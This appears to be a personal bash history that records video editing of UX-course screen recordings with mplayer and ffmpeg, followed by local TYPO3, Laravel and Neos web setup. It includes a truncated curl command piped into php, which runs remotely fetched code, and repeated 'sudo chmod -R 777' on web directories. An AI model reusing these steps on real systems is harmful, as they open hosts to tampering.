vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX1.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX1.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX1.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX1.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX1.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX1.mkv +ls +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX_1.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX1.mkv +rm vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX_1.mkv +rm vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX_1.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX1.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX1.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX1.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX2.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX2.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX3.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX3.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX3.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX3.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX3.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX3.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX3.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX3.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX3_.mkv +rm vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX3_.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX3.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX3.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX3.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX3.mkv +ls +mplayer vokoscreen-2017-04-26_13-32-02_edit_w1.mkv +ls +mv vokoscreen-2017-04-26_13-32-02.mkv Done/ +mplayer vokoscreen-2017-04-26_14-06-44.mkv +mplayer vokoscreen-2017-04-26_14-06-44.mkv +mplayer vokoscreen-2017-04-26_14-06-44.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit.mkv.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit.mkv +ls +mv vokoscreen-2017-04-26_14-06-44.mkv Done/ +mplayer vokoscreen-2017-04-26_14-06-44_edit_edit.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit_1.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit_1.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit_2.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit_2.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit_2.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit_2.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit_2.mkv +ls +ls +mplayer vokoscreen-2017-04-26_14-06-44_edit_2_edit_1_Skillshare_Open_Source_and_Neos.io.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit_2_edit_1_Skillshare_Open_Source_and_Neos.io.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit_2_edit_1_Skillshare_Open_Source_and_Neos.io.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit_2_edit_1_Skillshare_Open_Source_and_Neos.io.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit_2_edit_2_Reciproka.cc_and_Feedback.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit_2_edit_2_Reciproka.cc_and_Feedback.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit_2_edit_2_Reciproka.cc_and_Feedback.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit_2_edit_2_Reciproka.cc_and_Feedback.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit_2_edit_3_Platform_Impress.js_Tachyons.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit_2_edit_3_Platform_Impress.js_Tachyons.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit_2_edit_3_Platform_Impress.js_Tachyons.mkv +mplayer vokoscreen-2017-04-26_14-06-44_edit_2_edit_3_Platform_Impress.js_Tachyons.mkv +ls +mv vokoscreen-2017-04-26_14-06-44_edit_2.mkv Done +mv vokoscreen-2017-04-26_14-06-44_edit_edit.mkv Done +mv vokoscreen-2017-04-26_14-06-44_edit.mkv Done +ls +mplayer vokoscreen-2017-04-26_15-56-39.mkv +ls +mplayer vokoscreen-2017-04-26_15-56-39_edit_1_Benefits_of_good_UX-Design.mkv +mplayer vokoscreen-2017-04-26_15-56-39_edit_2_What_is_UX-Design.mkv +mplayer vokoscreen-2017-04-26_15-56-39_edit_2_What_is_UX-Design.mkv +mplayer vokoscreen-2017-04-26_15-56-39_edit_2_What_is_UX-Design.mkv +mplayer vokoscreen-2017-04-26_15-56-39_edit_2_What_is_UX-Design.mkv +mplayer vokoscreen-2017-04-26_15-56-39_edit_2_What_is_UX-Design.mkv +mplayer vokoscreen-2017-04-26_15-56-39_edit_2_What_is_UX-Design.mkv +mplayer vokoscreen-2017-04-26_15-56-39_edit_2_What_is_UX-Design.mkv +mplayer vokoscreen-2017-04-26_15-56-39_edit_2_What_is_UX-Design.mkv +mplayer vokoscreen-2017-04-26_15-56-39_edit_2_What_is_UX-Design.mkv +mplayer vokoscreen-2017-04-26_15-56-39_edit_3_User_Experience_Design.mkv +mplayer vokoscreen-2017-04-26_15-56-39_edit_4_Usability.mkv +ls +mv vokoscreen-2017-04-26_15-56-39.mkv Done +mplayer vokoscreen-2017-04-26_21-18-44.mkv +mv vokoscreen-2017-04-26_21-18-44.mkv vokoscreen-2017-04-26_21-18-44_heyDesigner.mkv +ls +mplayer vokoscreen-2017-04-26_21-29-48.mkv +mv vokoscreen-2017-04-26_21-29-48.mkv vokoscreen-2017-04-26_21-29-48_02_Groundwork.mkv +ls +mplayer vokoscreen-2017-04-26_21-41-37.mkv +mplayer vokoscreen-2017-04-26_21-29-48_02_Groundwork_edit.mkv +mplayer vokoscreen-2017-04-26_21-29-48_02_Groundwork_edit.mkv +ls +mv vokoscreen-2017-04-26_21-29-48_02_Groundwork.mkv Done +ls +mplayer vokoscreen-2017-04-26_21-41-37.mkv +mplayer vokoscreen-2017-04-26_21-41-37_edit.mkv +ls +mv vokoscreen-2017-04-26_21-41-37_edit.mkv vokoscreen-2017-04-26_21-41-37_simplygoodwork.mkv +mv vokoscreen-2017-04-26_21-41-37.mkv Done/ +ls +mplayer vokoscreen-2017-04-26_21-48-35.mkv +ls +mplayer vokoscreen-2017-04-26_22-10-56.mkv +ls +mv vokoscreen-2017-04-26_21-48-35.mkv Done +mplayer vokoscreen-2017-04-26_22-10-56.mkv +ls +mplayer vokoscreen-2017-04-26_22-10-56.mkv +mplayer vokoscreen-2017-04-26_22-10-56.mkv +mplayer vokoscreen-2017-04-26_22-10-56_edit.mkv +ls +mv vokoscreen-2017-04-26_22-10-56.mkv Done/ +mplayer vokoscreen-2017-04-26_22-37-32.mkv +mplayer vokoscreen-2017-04-26_22-37-32.mkv +ls +mplayer vokoscreen-2017-04-26_23-05-25.mkv +ls +mplayer vokoscreen-2017-04-26_23-12-29.mkv +ls +mplayer vokoscreen-2017-04-26_23-59-27.mkv +ls +mplayer vokoscreen-2017-04-27_00-15-10.mkv +mplayer vokoscreen-2017-04-27_00-38-37.mkv +ls +mplayer vokoscreen-2017-04-26_21-48-35_edit_03_Research_and_Strategy.mkv +ls +mplayer vokoscreen-2017-04-26_21-29-48_02_Groundwork_edit.mkv +ls +mplayer vokoscreen-2017-04-26_21-48-35_edit_03_Research_and_Strategy.mkv +ls +yaourt handbrake +handbrake-cli +sudo updatedb +locate handbrake +yaourt handbrake +handbrake +sudo updatedb +locate handbrake +locate handbrake* +ls +mplayer vokoscreen-2017-04-26_22-37-32_edit_1_Overview_and_1-Key-Elements.mp4 +mplayer vokoscreen-2017-04-26_22-37-32_edit_1_Overview_and_1-Key-Elements.mp4 +mplayer vokoscreen-2017-04-26_22-37-32_edit_1_Overview_and_1-Key-Elements.mp4 +mplayer vokoscreen-2017-04-26_22-37-32_edit_1_Overview_and_1-Key-Elements.mp4 +mplayer vokoscreen-2017-04-26_22-37-32_edit_1_Overview_and_1-Key-Elements.mp4 +mplayer vokoscreen-2017-04-26_22-37-32_edit_2_2-AIDA_and_the_Hooked_Pirate.mp4 +mplayer vokoscreen-2017-04-26_22-37-32_edit_2_2-AIDA_and_the_Hooked_Pirate.mp4 +mplayer vokoscreen-2017-04-26_22-37-32_edit_2_2-AIDA_and_the_Hooked_Pirate.mp4 +mplayer vokoscreen-2017-04-26_22-37-32_edit_2_2-AIDA_and_the_Hooked_Pirate.mp4 +mplayer vokoscreen-2017-04-26_22-37-32_edit_2_2-AIDA_and_the_Hooked_Pirate.mp4 +mplayer vokoscreen-2017-04-26_22-37-32_edit_2_2-AIDA_and_the_Hooked_Pirate.mp4 +mplayer vokoscreen-2017-04-26_22-37-32_edit_2_2-AIDA_and_the_Hooked_Pirate.mp4 +mplayer vokoscreen-2017-04-26_22-37-32_edit_2_2-AIDA_and_the_Hooked_Pirate.mp4 +mplayer vokoscreen-2017-04-26_22-37-32_edit_3_3_Attention-Span.mp4 +mplayer vokoscreen-2017-04-26_22-37-32_edit_3_3_Attention-Span2.mp4 +ls +mv vokoscreen-2017-04-26_22-37-32.mkv Done/ +mplayer vokoscreen-2017-04-26_23-05-25_Example_24ways.org.mp4 +mv vokoscreen-2017-04-26_23-05-25.mkv Done/ +mplayer vokoscreen-2017-04-26_23-12-29_edit_4_Keep_it_Short_and_Simple.mp4 +ls +mv vokoscreen-2017-04-26_23-12-29.mkv Done/ +mv Done/vokoscreen-2017-04-26_23-12-29.mkv . +ls +mplayer vokoscreen-2017-04-26_23-12-29_edit_5_Create_intuitive_Interfaces.mp4 +mplayer vokoscreen-2017-04-26_23-12-29_edit_5_Create_intuitive_Interfaces.mp4 +mplayer vokoscreen-2017-04-26_23-12-29_edit_6_Off-Topic_Freedom_of_the_Designer.mp4 +mplayer vokoscreen-2017-04-26_23-12-29_edit_6_Off-Topic_Freedom_of_the_Designer.mp4 +mplayer vokoscreen-2017-04-26_23-12-29_edit_6_Off-Topic_Freedom_of_the_Designer.mp4 +mplayer vokoscreen-2017-04-26_23-12-29_edit_6_Off-Topic_Freedom_of_the_Designer.mp4 +mplayer vokoscreen-2017-04-26_23-12-29_edit_6_Off-Topic_Freedom_of_the_Designer.mp4 +mplayer vokoscreen-2017-04-26_23-12-29_edit_7_6_Structure_and_Social_Proof.mp4 +mplayer vokoscreen-2017-04-26_23-12-29_edit_7_6_Structure_and_Social_Proof.mp4 +mplayer vokoscreen-2017-04-26_23-12-29_edit_8_7_Call_To_Action_Buttons.mp4 +mplayer vokoscreen-2017-04-26_23-12-29_edit_8_7_Call_To_Action_Buttons.mp4 +mplayer vokoscreen-2017-04-26_23-12-29_edit_9_8_Project_Tasks.mp4 +mplayer vokoscreen-2017-04-26_23-12-29_edit_9_8_Project_Tasks.mp4 +ls +mv vokoscreen-2017-04-26_23-12-29.mkv Done +mplayer vokoscreen-2017-04-26_23-59-27.mkv +mplayer vokoscreen-2017-04-26_23-59-27.mkv +mplayer vokoscreen-2017-04-26_23-59-27.mkv +mplayer vokoscreen-2017-04-26_23-59-27_edit.mp4 +mplayer vokoscreen-2017-04-26_23-59-27_edit.mp4 +mplayer vokoscreen-2017-04-26_23-59-27_edit.mp4 +mplayer vokoscreen-2017-04-26_23-59-27_edit.mp4 +mplayer vokoscreen-2017-04-26_23-59-27_edit.mp4 +mplayer vokoscreen-2017-04-26_23-59-27_edit.mp4 +mv vokoscreen-2017-04-26_23-59-27.mkv Done/ +mplayer vokoscreen-2017-04-27_00-15-10_edit_Overview_and_1_Start_with_a_clear_Strategy.mp4 +mplayer vokoscreen-2017-04-27_00-15-10_edit_Overview_and_1_Start_with_a_clear_Strategy.mp4 +mplayer vokoscreen-2017-04-27_00-15-10_edit_Overview_and_1_Start_with_a_clear_Strategy.mp4 +ls +mv vokoscreen-2017-04-27_00-15-10_edit_Overview_and_1_Start_with_a_clear_Strategy.mp4 vokoscreen-2017-04-27_00-15-10_edit_1_Overview_and_1_Start_with_a_clear_Strategy.mp4 +mplayer vokoscreen-2017-04-27_00-15-10_edit_3_Listen_to_feedback.mp4 +[A +mplayer vokoscreen-2017-04-27_00-15-10_edit_3_Listen_to_feedback.mp4 +mplayer vokoscreen-2017-04-27_00-15-10_edit_3_Listen_to_feedback.mp4 +mv vokoscreen-2017-04-27_00-15-10_edit_3_Collect_Statistics.mp4 vokoscreen-2017-04-27_00-15-10_edit_4_Collect_Statistics.mp4 +mplayer vokoscreen-2017-04-27_00-15-10_edit_4_Collect_Statistics.mp4 +mplayer vokoscreen-2017-04-27_00-15-10_edit_4_Collect_Statistics.mp4 +mplayer vokoscreen-2017-04-27_00-15-10_edit_4_Collect_Statistics.mp4 +mplayer vokoscreen-2017-04-27_00-15-10_edit_4_Collect_Statistics.mp4 +[A +mplayer vokoscreen-2017-04-27_00-15-10_edit_4_Collect_Statistics.mp4 +mplayer vokoscreen-2017-04-27_00-15-10_edit_4_Collect_Statistics.mp4 +mplayer vokoscreen-2017-04-27_00-15-10_edit_4_Collect_Statistics.mp4 +mplayer vokoscreen-2017-04-27_00-38-37_edit_1_wehmuth.mp4 +mplayer vokoscreen-2017-04-27_00-38-37_edit_1_wehmuth.mp4 +mplayer vokoscreen-2017-04-27_00-38-37_edit_2_Thank_you_for_watching.mp4 +ls +mv vokoscreen-2017-04-27_00-15-10.mkv Done/ +mv vokoscreen-2017-04-27_00-38-37.mkv Done/ +ls +#for i in *mkv; do ffmpeg -i $i -vcodec copy -acodec copy $i.mp4; done +mv Done/ Used +mkdir Finished +cp *.mkv Finished/ +ls +for i in *mkv; do ffmpeg -i $i -vcodec copy -acodec copy $i.mp4; done +ls +mkdir mp4 +mv *mp4 mp4/ +ls +ls +ls +rm *.mkv +mv * .. +ls +ls +rm mp4/ +rm -r mp4/ +ls +ls +rm 00_1_Hello_and_Setup.mp4 +cp *.mp4 Finished/ +ls +mplayer 00_7_Ahead_4-28.mkv.mp4 +l +ls +mplayer 00_6_Example_Onepager.de_22-09.mkv.mp4 +ls +mplayer 00_6_Example_Onepager.de_22-09.mkv +mplayer 00_7_Ahead_4-28.mkv +ls +mplayer 00_7_Ahead_4-28.mkv +mplayer 00_7_Ahead_4-28.mkv +ls +ls +mplayer 00_7_Ahead_4-28_then_00_8_Overview.mkv +cp 00_7_Ahead_4-28_then_00_8_Overview.mkv .. +ls +ls +mplayer 00_7_Ahead_4-28_then_00_8_Overview.mkv +ffmpeg -i 00_7_Ahead_4-28_then_00_8_Overview.mkv -vcodec copy -acodec copy 00_7_Ahead_4-28_then_00_8_Overview.mp4 +mplayer 00_7_Ahead_4-28_then_00_8_Overview.mp4 +ls +mplayer 00_7_Ahead_4-28_then_00_8_Overview_edit.mp4 +mplayer 00_7_Ahead_4-28_then_00_8_Overview_edit2.mp4 +ls +mv 00_7_Ahead_4-28_then_00_8_Overview_edit 00_7_Ahead.mp4 +mv 00_7_Ahead_4-28_then_00_8_Overview_edit.mp4 00_7_Ahead.mp4 +mv 00_7_Ahead_4-28_then_00_8_Overview_edit2.mp4 00_8_Overview.mp4 +ls +mv 00_7_Ahead.mp4 00_8_Overview.mp4 Finished/ +ls +mv 00_7_Ahead_4-28* Used/ +ls +ffmpeg -i 00_2_Introduction.mkv -vcodec copy -acodec copy 00_2_Introduction.mp4 +ls +ffmpeg -i 00_3_1_notPerfect_and_unsplash.com.mkv -vcodec copy -acodec copy 00_3_1_notPerfect_and_unsplash.com.mp4 +ls +mplayer 00_3_1_notPerfect_and_unsplash.com.mkv +ls +mplayer 00_3_1_notPerfect_and_unsplash.com.mp4 +ls +ffmpeg -i 00_3_2_Who_What_Why.mkv -vcodec copy -acodec copy 00_3_2_Who_What_Why.mp4 +ls +ffmpeg -i 00_6_Example_Onepager.de_22-09.mkv -vcodec copy -acodec copy 00_6_Example_Onepager.de_22-09.mp4 +ls +mplayer 00_6_Example_Onepager.de_22-09.m +mplayer 00_6_Example_Onepager.de_22-09.mkv +ls +mplayer vokoscreen-2017-04-26_23-12-29_edit_7_6_Structure_and_Social_Proof.mp4 +ls +ls +rm 00_7_Ahead_4-28.mkv.mp4 +rm 00_8_Overview.mkv.mp4 +ls +ls +ffmpeg -i 00_2_Introduction.mkv -vcodec copy -acodec copy 00_2_Introduction.mp4 +ls +mplayer 00_3_1_notPerfect_and_unsplash.com.m +mplayer 00_3_1_notPerfect_and_unsplash.com.mkv +mplayer 00_3_1_notPerfect_and_unsplash.com.mp4 +ls +ffmpeg -i 00_5_Example_Reciproka.cc_19-32.mkv -vcodec copy -acodec copy 00_5_Example_Reciproka.cc_19-32.mp4 +ffmpeg -i 00_5_2_Reciproka2.mkv -vcodec copy -acodec copy 00_5_2_Reciproka2.mp4 +ls +ls +mv 00_8_Overview.mkv Used/ +ls Finished/ +ls +rm 00_2_Introduction.mp4 +mv 00_2_Introduction.mkv Used/ +ls +mv 00_6_Example_Onepager.de_24-45.mkv .. +mplayer vokoscreen-2017-04-26_13-32-02.mkv +mv vokoscreen-2017-04-26_13-32-02.mkv .. +ls +mv vokoscreen-2017-04-26_13-32-02.mkv Used/ +ls +mplayer vokoscreen-2017-04-26_13-32-02.mkv +ls +mplayer vokoscreen-2017-04-26_14-06-44.mkv +ls +ls +mplayer 00_3_2_Who_What_Why.m +mplayer 00_3_2_Who_What_Why.mkv +ls +mplayer 00_3_2_Who_What_Why.mkv +ls +mplayer 00_3_2_Who_What_Why.mkv +ls +ls Finished/ +ls +ls +mplayer 00_3_1_notPerfect_and_unsplash.com.mkv.mp4 +mplayer 00_3_1_notPerfect_and_unsplash.com.mkv.mp4 +ls +mplayer 00_3_Wh +mplayer 00_3_2_Who_What_Why.mkv.mp4 +ls +mkdir redo +mv 00_3_* redo/ +mv 00_6_Example_Onepager.de_22-09.mkv.mp4 redo/ +mv 00_5_2_Reciproka2.mkv.mp4 redo/ +ls +ls +mplayer 00_6_Example_Onepager.de_24-45.mkv +ls +mplayer 00_5_2_Reciproka2_2.mp4 +mplayer 00_5_2_Reciproka2_2.mp4 +mplayer 00_5_2_Reciproka2_2.mp4 +mplayer 00_5_2_Reciproka2_2.mp4 +ls +mv 00_5_2_Reciproka2.* Used/ +ls +ls +mplayer 00_5_Example_Reciproka.cc_19-32_edit_done.mp4 +ls +ls +mv 00_5_Example_Reciproka.cc_19-32_edit_done.mp4 Finished/ +ls +mv 00_5_Example_Reciproka.cc_19-32.mkv.mp4 redo/ +ls +ls +mplayer 00_6_Example_Onepager.de_24-45.mp4 +ls +cp 00_6_Example_Onepager.de_24-45.mp4 Finished/ +ls +mv 00_6_Example_Onepager.de_24-45.mp4 redo/ +mv redo/00_6_Example_Onepager.de_24-45.mp4 . +ls +ls +cp Used/vokoscreen-2017-04-26_13-32-02.mkv . +ls +mplayer 00_3_2_Who_What_Why_2.mp4 +mplayer 00_3_2_Who_What_Why_2.mp4 +mplayer 00_3_2_Who_What_Why_2.mp4 +mplayer 00_3_2_Who_What_Why_2.mp4 +mplayer 00_3_2_Who_What_Why_2.mp4 +mplayer 00_3_2_Who_What_Why_2.mp4 +mplayer 00_3_2_Who_What_Why_2.mp4 +mplayer 00_3_2_Who_What_Why_2.mp4 +ls +mv 00_3_2_Who_What_Why_2.mp4 Finished/ +rm 00_3_2_Who_What_Why.m* +mv 00_3_1_notPerfect_and_unsplash.com.m* Outtake/ +rm 00_3_3_Amazon_and_Paypal.mkv +mv 00_5_2_Reciproka2_2.mp4 Used/ +ls +mv 00_3_2_Who_What_Why_2.mp4 00_3_2_Unsplash_Who_What_Why_and_the_Buying-Process.mp4 +ls +ls +ls +ls +ls +mv 00_3_3_Wireframes_and_Prototypes.mp4 Finished/ +mplayer 00_3_3_Wireframes_and_Prototypes.mp4 +ls +rm -r redo/ +ls +mplayer 00_3_4_UX-Design-Basics_and_Product-Quality.mp4 +mplayer 00_3_4_UX-Design-Basics_and_Product-Quality.mp4 +mplayer 00_3_4_UX-Design-Basics_and_Product-Quality.mp4 +ls +mplayer 00_3_4_UI-vs-UX-Design-Example.mp4 +ls +mv 00_3_4_UI-vs-UX-Design-Example.mp4 00_3_5_UI-vs-UX-Design-Example.mp4 +ls +ls +rm vokoscreen-2017-04-26_13-32-02_edit_w* +ls +ls +mplayer vokoscreen-2017-04-26_14-06-44_edit_1.mkv_edit.mp4 +ls +ls +ffmpeg -i vokoscreen-2017-04-26_14-06-44_edit_2_edit_1_Skillshare_Open_Source_and_Neos.io.mkv -vcodec copy -acodec copy test.mp4 +rm test.mp4 +ffmpeg -i Finished/vokoscreen-2017-04-26_14-06-44_edit_1.mkv_edit.mp4 -vcodec copy -acodec copy test.mp4 +rm test.mp4 +#ffmpeg -i input1.mp4 -c copy -bsf:v h264_mp4toannexb -f mpegts input1.ts +ffmpeg -i Finished/vokoscreen-2017-04-26_14-06-44_edit_1.mkv_edit.mp4 -vcodec copy -acodec copy test2.mp4 +ffmpeg -i vokoscreen-2017-04-26_14-06-44_edit_2_edit_1_Skillshare_Open_Source_and_Neos.io.mkv -vcodec copy -acodec copy test.mp4 +#ffmpeg -i test.mp4 -c copy -bsf:v h264_mp4toannexb -f mpegts input1.ts +ffmpeg -i test.mp4 -c copy -bsf:v h264_mp4toannexb -f mpegts input1.ts +ffmpeg -i test2.mp4 -c copy -bsf:v h264_mp4toannexb -f mpegts input2.ts +ls +ffmpeg -i "concat:input1.ts|input2.ts" -c copy output.mp4 +mplayer output.mp4 +ffmpeg -i "concat:input2.ts|input1.ts" -c copy output.mp4 +mplayer output.mp4 +ls +mv input* Used/ +rm test* +mv output.mp4 Finished/ +ls +mv output.mp4 00_9_Background-Story-1_About-Me_Skillshare_and_Open-Source_.mp4 +rm 00_9_Background-Story-1_About-Me_Skillshare_and_Open-Source.mp4 +mv 00_9_Background-Story-1_About-Me_Skillshare_and_Open-Source_.mp4 00_9_Background-Story-1_About-Me_Skillshare_and_Open-Source.mp4 +ls +rm vokoscreen-2017-04-26_14-06-44_edit_1* +ls +node server.js +ls +ffmpeg -i 00_1_Hello_and_Setup.mkv -vcodec copy -acodec copy 00_1_Hello_and_Setup.mp4 +ls +killall openshot-qt +killall openshot-qt +ls +ffmpeg -i Fearless\ First.mp3 -af "volume=0.2" Fearless_First_lowered.mp3 +mplayer Fearless\ First.mp3 +mplayer Fearless_First_lowered.mp3 +locate fearless +locate Fearless +gulp watch +gulp watch +gulp watch +sudo cp UpDown.png /srv/http/contentflow/Backend/resources/assets/img/ +sudo cp UpDown_dark.png /srv/http/contentflow/Backend/resources/assets/img/ +xbacklight -set 1 +xbacklight -set 11 +print Playbook\ Alsters\ Ho\ Stack.pdf +mv Playbook\ Alsters\ Ho\ Stack.pdf Playbook_Alsters_Ho-Stack.pdf +print Playbook_Alsters_Ho-Stack.pdf +gulp watch +gulp watch +php artisan migrate:refresh --seed +rm -rf database/migrations/2017_04_10_075721_create_elementgallery_table.php +php artisan migrate:refresh --seed +composer dump-autoload +php artisan migrate:refresh --seed +gulp watch +gulp watch +php artisan migrate:refresh --seed +killall chromium +killall chromium +acpi +acpi +acpi +acpi +history +ls +ls +node server.js +grunt +ls +ls +cat Gruntfile.js +ls +ls SysDefense +grunt +bluetoothctl +redshift +ls +mkdir diebacher +mv diebacher/ diesbacher +git clonesNewSaes/Skeleton-Sass.git +rm diesbacher/ +rm -rf diesbacher/ +mv Skeleton-Sass/ diesbacher +ls +grunt +npm install +grint +frunt +grunt +npm install swiper +grunt +npm install jquery +mkdir js +main.js +touch main.js +grunt +sudo cp -r /run/media/goalador/VolumeBackups/linuxbackup/http/wehmuth /srv/http/diessbacher +mv diessbacher/ wehmuth +sudo mv diessbacher/ wehmuth +ls +ls +./sh typo3-base.sh +./typo3-base.sh +php -v +./typo3-base.sh -i true +mv typo3-base gc-typo3-base +sudo mv typo3-base gc-typo3-base +sudo mv typo3-base gc-typo3-base +ls +./typo3-base.sh -i true +sudo ./typo3-base.sh -i true +gc-typo3-base/files/composer.phar self-update +sudo ./typo3-base.sh -i true +sudo ./typo3-base.sh -i true +la +chown -R http:goalador diessbacher/ +sudo chown -R http:goalador diessbacher/ +la +la +./typo3-base.sh -i true +la +chmod -R 775 . +sudo chmod -R 775 . +la +./typo3-base.sh -i true +ls +./typo3-base.sh -i true +sudo ./typo3-base.sh -i true +./typo3-base.sh -i true +vim composer.json +./typo3-base.sh -i true +vim composer.json +vim gc-typo3-base/files/composer.json +./typo3-base.sh -i true +ls +./createdb.sh +./createdb.sh diessbacher admin test +./createdb.sh diessbacher admin test +./setup.sh +./setup.sh -sue +ls typo3conf/ +vim /etc/php/php.ini +vim /etc/php/php.ini +vim /etc/php/php.ini +sudo systemctl restart httpd.service +ls typo3conf/ +vim typo3conf/LocalConfiguration.php +vim typo3conf/LocalConfiguration.php +ls +rm -rf typo3temp/* +sudo rm -rf typo3temp/* +la +sudo chmod -R 777 . +sudo chown -R http:goalador . +la +mv typo3conf/LocalConfiguration.php typo3conf/LocalConfiguration.php~ +vim /etc/php/php.ini +sudo systemctl restart httpd.service +sudo rm -rf typo3temp/* +mv typo3conf/LocalConfiguration.php typo3conf/LocalConfiguration.php~ +locate httpd.conf +vim /etc/httpd/conf/httpd.conf +sudo systemctl restart httpd.service +systemctl +ls +./typo3-base.sh -i true +ls +la +./typo3-base.sh -i true +vim /etc/php/php.ini +./typo3-base.sh -i true +la +sudo chmod -R 777 . +sudo chown -R http:goalador . +la +tail /var/log/httpd/error_log +sudo systemctl restart httpd.service +tail -20 /var/log/httpd/error_log +tail -20 /var/log/httpd/error_log +tail -20 /var/log/httpd/error_log +ls +cat typo3conf/AdditionalConfiguration.php +tail -20 /var/log/httpd/error_log +sudo rm -rf typo3temp/* +mv typo3conf/LocalConfiguration.php typo3conf/LocalConfiguration.php~ +ls +./setup.sh +./setup.sh -s +./setup.sh -s true +la +sudo chown -R http:goalador . +sudo chmod -R 777 . +./setup.sh -s true +la +la typo3conf/ext +sudo ./setup.sh -s true +./setup.sh -s +sudo ./setup.sh -u true +sudo ./setup.sh -e true +cat setup.sh +cat typo3conf/LocalConfiguration.php +cat setup.sh +la +ls typo3temp/ +la typo3temp/ +la +la typo3temp/ +la typo3temp/var/Cache/Data/ +sudo chmod -R 777 . +sudo rm -rf typo3temp/* +ls +gulp watch +gulp watch +php artisan migrate:refresh --seed +gulp watch +grep autoplay +gulp watch +php artisan migrate:refresh --seed +gulp watch +php artisan migrate:refresh --seed +gulp watch +feh --bg-fill ~/Pictures/Wallpapers/andrew-furlan-195339_darker.jpg +php artisan migrate:refresh --seed +git status +git status +git branch +git push -u origin MediaModule +gulp watch +gulp watch +gulp watch +ls +ls ~/webentwicklung +ls ~/webentwicklung/webappcreations/ +ls ~/webentwicklung/webappcreations/GitHub/ +ls ~/webentwicklung/GitHub/ +ls ~/webentwicklung/webappcreations/Webseiten/ +ls ~/webentwicklung/webappcreations/Webseiten/backup/ +ls ~/webentwicklung/webappcreations/Webseiten/backup/important/ +mkdir Neos +sudo mkdir Neos +pwd +ls +locate composer.phar +sudo chown -R http:goalador . +la +sudo chmod -R 777 . +la +curl -sSser.org/installer | php +ls +php composer.phar create-project neos/neos-base-distribution Neos31 +vim /etc/httpd/conf/extra/httpd-vhosts.conf +vim /etc/hosts +sudo systemctl restart httpd.service +cat /etc/group +gpasswd -a goalador http +sudo gpasswd -a goalador http +la +sudo ./flow core:setfilepermissions goalador http http +sudo ./flow core:setfilepermissions goalador http http +la +cat /srv/http/Neos/Neos31/Data/SetupPassword.txt +xbacklight -set 1 +xbacklight -set 11 +mkidr NeosIo +mkdir NeosIo +git clones/Neos.NeosIo.git . +vim /etc/httpd/conf/extra/httpd-vhosts.conf +vim /etc/hosts +ls +nvm install v4.2.2 +yaourt nvm +echo 'source /usr/share/nvm/init-nvm.sh' >> ~/.bashrc +nvm install v4.2.2 +ls +npm install +ls +ls Web/ +ls Configuration/ +ls +npm install +sudo systemctl restart httpd.service +vim /etc/hosts +vim /etc/httpd/conf/extra/httpd-vhosts.conf +sudo systemctl restart httpd.service +ls +ls +pwd +vim /etc/httpd/conf/extra/httpd-vhosts.conf +sudo systemctl restart httpd.service +ls Web/ +ls Web/ + ./flow node:repair +ls +ls Packages/Sites/webappcreations.diessbacherbablDe/ + ./flow node:repair + ./flow node:repair +mkdir -p Translations/en/NodeTypes/ +ls +touch Swiper.xlf +touch SwiperSlide.xlf +ls +cp -r diesbacher diesbacher_bak_preview1 +cp -r Neos31 Neos31_bak_swiper +ls +composer require flowpack/listable +ls Packages/ +flow node:repair --node-type 